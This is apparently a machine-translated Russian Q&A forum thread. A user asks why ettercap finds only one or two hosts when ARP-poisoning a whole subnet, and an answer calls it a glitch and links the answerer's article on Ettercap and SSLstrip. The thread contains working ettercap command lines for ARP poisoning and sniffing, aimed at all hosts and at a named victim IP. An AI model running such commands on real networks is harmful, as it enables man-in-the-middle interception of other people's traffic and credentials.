ettercap не сканирует все хосты
Я попытался запустить ettercap следующим образом:
sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data // /10.8.40.250/
Но ettercap может добавить только 2 (иногда 1) хоста в список хостов.
Scanning the whole netmask for 8191 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Почему это только печатная группа 1?
Если я попытаюсь отравить конкретного хозяина,
sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data /10.8.41.202/ /10.8.40.250/
Оно работает!
мой ip: 10.8.57.121 маска подсети: 255.255.224.0
Некоторое время назад я смог запустить ту же самую вещь, добавить 20-30 хостов и успешно отравить большинство из них ARP. Что я делаю не так сейчас?
1 ответ
Я недавно написал статью о Ettercap & SSLstrip. ( http://bidabe.zapto.org/?p=17)
Вы не делаете ничего плохого, если вы снова и снова запускаете одну и ту же командную строку, вы заметите, что "Группа 2" появляется ошибочно.
Используя интерактивный режим с autoadd, вы можете видеть все хосты (для этой подсети), которые кешируются в режиме реального времени. Я считаю, что это глюк.